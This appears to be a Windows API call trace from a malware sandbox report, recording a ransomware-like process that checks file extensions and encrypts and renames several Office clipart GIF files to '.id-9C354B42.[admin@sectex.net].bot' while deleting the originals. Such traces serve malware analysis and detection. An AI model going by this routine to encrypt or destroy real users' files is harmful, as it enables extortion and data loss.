	[0056.675] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0056.675] lstrlenW (lpString=".bz2") returned 4
	[0056.675] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0056.675] lstrlenW (lpString=".7z") returned 3
	[0056.675] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0056.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63
	[0056.675] lstrlenW (lpString=".dbf") returned 4
	[0056.675] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0056.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63
	[0056.675] lstrlenW (lpString=".1cd") returned 4
	[0056.675] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0056.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63
	[0056.676] lstrlenW (lpString=".jpg") returned 4
	[0056.676] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0056.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63
	[0056.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63
	[0056.676] lstrlenW (lpString=".doc") returned 4
	[0056.676] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0056.676] lstrlenW (lpString=".docx") returned 5
	[0056.676] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0056.676] lstrlenW (lpString=".pdf") returned 4
	[0056.676] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0056.676] lstrlenW (lpString=".xls") returned 4
	[0056.676] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0056.676] lstrlenW (lpString=".xlsx") returned 5
	[0056.676] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0056.676] lstrlenW (lpString=".ppt") returned 4
	[0056.676] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0056.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63
	[0056.676] lstrlenW (lpString=".zip") returned 4
	[0056.676] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0056.676] lstrlenW (lpString=".rar") returned 4
	[0056.676] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0056.676] lstrlenW (lpString=".bz2") returned 4
	[0056.676] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0056.676] lstrlenW (lpString=".7z") returned 3
	[0056.676] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0056.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63
	[0056.676] lstrlenW (lpString=".dbf") returned 4
	[0056.676] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0056.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63
	[0056.676] lstrlenW (lpString=".1cd") returned 4
	[0056.676] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0056.676] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63
	[0056.676] lstrlenW (lpString=".jpg") returned 4
	[0056.676] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0056.677] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0056.677] lstrlenW (lpString="AG00165_.GIF") returned 12
	[0056.677] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0056.679] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=8582) returned 1
	[0056.679] CloseHandle (hObject=0x21c) returned 1
	[0056.679] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif")) returned 0x20
	[0056.679] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0056.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0056.680] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.680] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c
	[0056.680] GetLastError () returned 0x0
	[0056.680] ReadFile (in: hFile=0x21c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x2186, lpOverlapped=0x0) returned 1
	[0056.682] WriteFile (in: hFile=0x23c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x2190, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x2190, lpOverlapped=0x0) returned 1
	[0056.683] ReadFile (in: hFile=0x21c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0056.683] WriteFile (in: hFile=0x23c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0056.683] SetEndOfFile (hFile=0x23c) returned 1
	[0056.684] CloseHandle (hObject=0x23c) returned 1
	[0056.684] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.684] SetEndOfFile (hFile=0x21c) returned 1
	[0056.685] CloseHandle (hObject=0x21c) returned 1
	[0056.685] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0056.685] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif")) returned 1
	[0056.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63
	[0056.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63
	[0056.685] lstrlenW (lpString=".doc") returned 4
	[0056.685] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0056.685] lstrlenW (lpString=".docx") returned 5
	[0056.685] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0056.685] lstrlenW (lpString=".pdf") returned 4
	[0056.685] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0056.685] lstrlenW (lpString=".xls") returned 4
	[0056.685] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0056.685] lstrlenW (lpString=".xlsx") returned 5
	[0056.685] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0056.685] lstrlenW (lpString=".ppt") returned 4
	[0056.685] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0056.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63
	[0056.685] lstrlenW (lpString=".zip") returned 4
	[0056.685] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0056.686] lstrlenW (lpString=".rar") returned 4
	[0056.686] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0056.686] lstrlenW (lpString=".bz2") returned 4
	[0056.686] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0056.686] lstrlenW (lpString=".7z") returned 3
	[0056.686] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0056.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63
	[0056.686] lstrlenW (lpString=".dbf") returned 4
	[0056.686] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0056.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63
	[0056.686] lstrlenW (lpString=".1cd") returned 4
	[0056.686] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0056.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63
	[0056.686] lstrlenW (lpString=".jpg") returned 4
	[0056.686] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0056.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63
	[0056.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63
	[0056.686] lstrlenW (lpString=".doc") returned 4
	[0056.686] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0056.686] lstrlenW (lpString=".docx") returned 5
	[0056.686] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0056.686] lstrlenW (lpString=".pdf") returned 4
	[0056.686] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0056.686] lstrlenW (lpString=".xls") returned 4
	[0056.686] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0056.686] lstrlenW (lpString=".xlsx") returned 5
	[0056.686] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0056.686] lstrlenW (lpString=".ppt") returned 4
	[0056.686] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0056.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63
	[0056.686] lstrlenW (lpString=".zip") returned 4
	[0056.686] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0056.686] lstrlenW (lpString=".rar") returned 4
	[0056.686] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0056.687] lstrlenW (lpString=".bz2") returned 4
	[0056.687] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0056.687] lstrlenW (lpString=".7z") returned 3
	[0056.687] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0056.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63
	[0056.687] lstrlenW (lpString=".dbf") returned 4
	[0056.687] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0056.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63
	[0056.687] lstrlenW (lpString=".1cd") returned 4
	[0056.687] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0056.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63
	[0056.687] lstrlenW (lpString=".jpg") returned 4
	[0056.687] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0056.687] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0056.687] lstrlenW (lpString="AG00167_.GIF") returned 12
	[0056.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0056.687] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=4894) returned 1
	[0056.687] CloseHandle (hObject=0x21c) returned 1
	[0056.687] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif")) returned 0x20
	[0056.687] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0056.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0056.688] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.688] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c
	[0056.688] GetLastError () returned 0x0
	[0056.688] ReadFile (in: hFile=0x21c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x131e, lpOverlapped=0x0) returned 1
	[0056.690] WriteFile (in: hFile=0x23c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x1320, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x1320, lpOverlapped=0x0) returned 1
	[0056.691] ReadFile (in: hFile=0x21c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0056.691] WriteFile (in: hFile=0x23c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0056.691] SetEndOfFile (hFile=0x23c) returned 1
	[0056.691] CloseHandle (hObject=0x23c) returned 1
	[0056.691] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.691] SetEndOfFile (hFile=0x21c) returned 1
	[0056.692] CloseHandle (hObject=0x21c) returned 1
	[0056.692] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0056.692] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif")) returned 1
	[0056.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63
	[0056.692] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63
	[0056.692] lstrlenW (lpString=".doc") returned 4
	[0056.692] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0056.692] lstrlenW (lpString=".docx") returned 5
	[0056.692] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0056.692] lstrlenW (lpString=".pdf") returned 4
	[0056.692] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0056.693] lstrlenW (lpString=".xls") returned 4
	[0056.693] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0056.693] lstrlenW (lpString=".xlsx") returned 5
	[0056.693] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0056.693] lstrlenW (lpString=".ppt") returned 4
	[0056.693] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0056.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63
	[0056.693] lstrlenW (lpString=".zip") returned 4
	[0056.693] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0056.693] lstrlenW (lpString=".rar") returned 4
	[0056.693] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0056.693] lstrlenW (lpString=".bz2") returned 4
	[0056.693] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0056.693] lstrlenW (lpString=".7z") returned 3
	[0056.693] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0056.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63
	[0056.693] lstrlenW (lpString=".dbf") returned 4
	[0056.693] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0056.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63
	[0056.693] lstrlenW (lpString=".1cd") returned 4
	[0056.693] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0056.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63
	[0056.693] lstrlenW (lpString=".jpg") returned 4
	[0056.693] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0056.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63
	[0056.693] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63
	[0056.693] lstrlenW (lpString=".doc") returned 4
	[0056.693] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0056.693] lstrlenW (lpString=".docx") returned 5
	[0056.693] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0056.693] lstrlenW (lpString=".pdf") returned 4
	[0056.693] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0056.693] lstrlenW (lpString=".xls") returned 4
	[0056.694] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0056.694] lstrlenW (lpString=".xlsx") returned 5
	[0056.694] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0056.694] lstrlenW (lpString=".ppt") returned 4
	[0056.694] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0056.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63
	[0056.694] lstrlenW (lpString=".zip") returned 4
	[0056.694] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0056.694] lstrlenW (lpString=".rar") returned 4
	[0056.694] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0056.694] lstrlenW (lpString=".bz2") returned 4
	[0056.694] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0056.694] lstrlenW (lpString=".7z") returned 3
	[0056.694] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0056.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63
	[0056.694] lstrlenW (lpString=".dbf") returned 4
	[0056.694] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0056.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63
	[0056.694] lstrlenW (lpString=".1cd") returned 4
	[0056.694] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0056.694] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63
	[0056.694] lstrlenW (lpString=".jpg") returned 4
	[0056.694] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0056.694] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0056.694] lstrlenW (lpString="AG00169_.GIF") returned 12
	[0056.694] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0056.695] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=5375) returned 1
	[0056.695] CloseHandle (hObject=0x21c) returned 1
	[0056.695] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif")) returned 0x20
	[0056.695] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0056.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0056.695] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.695] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c
	[0056.695] GetLastError () returned 0x0
	[0056.695] ReadFile (in: hFile=0x21c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x14ff, lpOverlapped=0x0) returned 1
	[0056.697] WriteFile (in: hFile=0x23c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x1500, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x1500, lpOverlapped=0x0) returned 1
	[0056.698] ReadFile (in: hFile=0x21c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0056.698] WriteFile (in: hFile=0x23c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0056.698] SetEndOfFile (hFile=0x23c) returned 1
	[0056.698] CloseHandle (hObject=0x23c) returned 1
	[0056.698] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.698] SetEndOfFile (hFile=0x21c) returned 1
	[0056.699] CloseHandle (hObject=0x21c) returned 1
	[0056.699] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0056.699] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif")) returned 1
	[0056.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63
	[0056.699] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63
	[0056.700] lstrlenW (lpString=".doc") returned 4
	[0056.700] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0056.700] lstrlenW (lpString=".docx") returned 5
	[0056.700] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0056.700] lstrlenW (lpString=".pdf") returned 4
	[0056.700] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0056.700] lstrlenW (lpString=".xls") returned 4
	[0056.700] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0056.700] lstrlenW (lpString=".xlsx") returned 5
	[0056.700] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0056.700] lstrlenW (lpString=".ppt") returned 4
	[0056.700] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0056.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63
	[0056.700] lstrlenW (lpString=".zip") returned 4
	[0056.700] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0056.700] lstrlenW (lpString=".rar") returned 4
	[0056.700] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0056.700] lstrlenW (lpString=".bz2") returned 4
	[0056.700] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0056.700] lstrlenW (lpString=".7z") returned 3
	[0056.700] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0056.700] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63
